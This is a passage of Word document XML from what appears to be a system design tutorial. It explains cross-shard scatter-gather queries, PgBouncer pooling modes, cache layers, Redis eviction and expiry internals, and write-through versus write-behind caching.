    <w:p w14:paraId="7E94E957" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cross-Shard Queries — The Fundamental Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C8AD76" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>A query like SELECT * FROM orders WHERE user_id IN (123, 456, 789) where users 123, 456, and 789 are on different shards requires:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB34F45" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="211"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scatter:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Send the query to all relevant shards simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF50E3D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="211"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Gather:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Collect results from all shards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133023E3" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="211"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Merge:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Merge and sort results in the application layer (or a query coordinator).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DD7A41" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>This scatter-gather pattern has several costs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A7F1B2" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="212"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Latency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Total latency = slowest shard's latency (you wait for all).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF00A95" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="212"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CPU:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> The application or coordinator must merge potentially large result sets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD2FCED" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="212"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Complexity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Pagination across shards is non-trivial (you can't simply OFFSET/LIMIT per shard).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3DE13E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="212"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aggregations:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> COUNT(*), SUM(), AVG() must be computed per-shard and then combined (which is possible but adds complexity, especially for AVG which requires tracking count and sum separately).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF6FCDC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JOINs across shards</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> are the worst case — they require pulling data from multiple shards into a single location for joining, which is extremely expensive. The solution: </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>denormalization</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — embed the joined data into a single shard's records to eliminate cross-shard joins. This trades storage space and write complexity for query efficiency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4F6F25" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connection Pooling — Why It Exists and How It Works Internally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3467B596" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>A direct database connection is expensive: TCP handshake, TLS negotiation (if encrypted), authentication, session state initialization. PostgreSQL allocates ~5–10MB of memory per connection and a backend process. MySQL threads are lighter but still significant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09ADF87D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>With 1,000 application server instances each needing 10 database connections, you'd need 10,000 database connections. PostgreSQL's default max_connections = 100. At 10,000 connections, the database spends more CPU context-switching between backend processes than executing queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72228157" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PgBouncer (PostgreSQL connection pooler) internals:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C8CDB5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>PgBouncer sits between application servers and PostgreSQL, maintaining a </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>small pool of actual database connections</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>. Applications connect to PgBouncer (which can handle thousands of application connections), and PgBouncer multiplexes them onto the small backend pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22887033" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Three pooling modes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67450707" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Session mode:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> A database connection is assigned to a client for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>entire client session</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> duration. Equivalent to no pooling for persistent application connections. Only useful for connection throttling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2B81B7" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Transaction mode:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> A database connection is held only during an </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>active transaction</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t xml:space="preserve">. On COMMIT/ROLLBACK, the connection returns to the pool. A client running 10 queries in separate transactions only holds a database connection for the microseconds each </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>transaction is active. Allows extreme oversubscription — 10,000 application connections on 100 database connections. </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Trade-off:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Session-level features break (prepared statements per connection, SET commands, LISTEN/NOTIFY, advisory locks that survive transaction boundaries).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461C3215" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Statement mode:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Connection returned to pool after each individual statement. Maximum oversubscription but breaks multi-statement transactions entirely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BA18FC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The server-side prepared statement problem with transaction pooling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> When a connection is returned to the pool and assigned to a different client, it carries the previous session's prepared statements. This causes statement name conflicts. Solutions: use protocol-level prepared statements (PostgreSQL protocol tracks these), or disable server-side prepared statements and use simple query protocol (less efficient but pooling-compatible).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785D4EB7" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="60CE453C">
          <v:rect id="_x0000_i2427" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA1B426" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Caching — The Mechanics of Speed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C88DE6A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Caching exploits </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>temporal locality</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> (recently accessed data will likely be accessed again) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>referential locality</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> (data accessed together is often requested together) to serve data from fast storage instead of slow storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C93C5B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache Architecture Layers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381D6393" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>L1 — In-process cache:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Stored in the application's own memory (JVM heap, Python dict, Go map). </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Microsecond access</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>, no network round-trip. Size limited by application memory footprint. Not shared between application instances — each instance has its own cache. Suitable for small, read-only configuration data, computed constants.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A81C343" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>L2 — Local disk cache:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Application caches on local SSD. Sub-millisecond access. Not shared between instances. Suitable for larger cached responses, compiled templates, ML model artifacts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2CB868" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>L3 — Distributed cache (Redis, Memcached):</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Shared across all application instances. Millisecond access (one network round-trip). Horizontally scalable (Redis Cluster). Suitable for session data, user preferences, computed expensive query results, leaderboards, rate limiting counters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AB4A2B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>L4 — CDN edge cache:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Geographically distributed, serves static and semi-static content from locations close to users. Sub-millisecond to low-millisecond access. Suitable for static assets, API responses with high cache hit rates, rendered HTML pages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13492C0A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>L5 — Database query cache:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Some databases (MySQL historically) cache query results internally. Generally deprecated now because application-level caching is more flexible and controllable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792B3BFE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Redis Internals — How It Actually Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA9809A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Redis is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>single-threaded event loop</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> (for command processing) storing data structures in memory. Single-threaded means no lock contention on data structures — all operations are serialized, which is why Redis can handle 100,000+ operations/second on a single core without locking overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B75B34" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The event loop:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Redis uses epoll (Linux) / kqueue (macOS) to multiplex I/O across thousands of client connections without blocking. Each iteration of the event loop:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C32A9C4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="213"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Check for incoming client data (non-blocking read).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA78FCE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="213"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Parse and execute commands serially.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D44B63E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="213"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Write responses to client buffers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20102B49" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="213"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Check timer events (key expiry, background tasks).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2759634B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Memory management:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Redis uses its own </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>jemalloc-based memory allocator</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> rather than standard malloc. It tracks exact memory usage per key. Redis's maxmemory setting caps total memory. When memory is full, the configured eviction policy kicks in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B42EA92" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Eviction policy mechanics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412DB0F7" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>allkeys-lru:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> When memory is full, evict the least recently used key across all keys. Redis doesn't maintain a true LRU list (that would require O(1) update on every access with a linked list — expensive). Instead, it uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>approximated LRU</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>: on each eviction decision, Redis samples N random keys (default N=5), selects the one with the oldest last-access timestamp, and evicts it. This approximates LRU with much lower overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EAC9FA" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>allkeys-lfu:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Evict the least </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>frequently</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> used key. Each key has a frequency counter using Morris's algorithm — a probabilistic counter that uses logarithmic space. The counter </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>decays over time</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> (halved periodically based on lfu-decay-time). This prevents keys that were popular months ago from never being evicted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5331EC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>volatile-ttl:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Among keys with TTLs set, evict the key with the soonest expiration. Prioritizes evicting data that was going to expire soon anyway.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AEE3C2" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key expiry mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446445B8" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Redis uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lazy expiry + active expiry</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> in combination:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D37F2E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="214"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lazy expiry:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> When a key is accessed, Redis checks if it's expired. If yes, delete it and return nil. No background work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC2F1A9" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="214"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Active expiry:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Every 100ms, Redis randomly samples 20 keys that have TTLs set. It expires all that are past their TTL. If more than 25% of sampled keys were expired, repeat immediately (because expiration backlog is large). Continue until &lt;25% of samples are expired.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABDB417" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>This combination means </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>expired keys are not immediately deleted</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — there's a window where a key has passed its TTL but hasn't been actively evicted yet. Redis's reported memory usage may temporarily be inflated by expired-but-not-yet-collected keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB2AC13" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache Invalidation — The Hardest Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438026F3" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>"There are only two hard things in computer science: cache invalidation and naming things." — Phil Karlton</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26630E26" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Write-Through:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> On every write, update both the cache and the database synchronously, in the same operation. Cache is always consistent with the database. Read performance is excellent (always cache hits). Write latency is higher — must wait for both cache write and database write to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4122816D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Write-Behind (Write-Back):</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Write to cache immediately, acknowledge the write to the client, then </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>asynchronously flush to the database</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>. Extremely low write latency — the client doesn't wait for database I/O. Risk: if the cache node fails before flushing to the database, those writes are </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>permanently lost</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>. Requires crash recovery mechanisms (Redis AOF — Append-Only File — for durability).</w:t>
      </w:r>
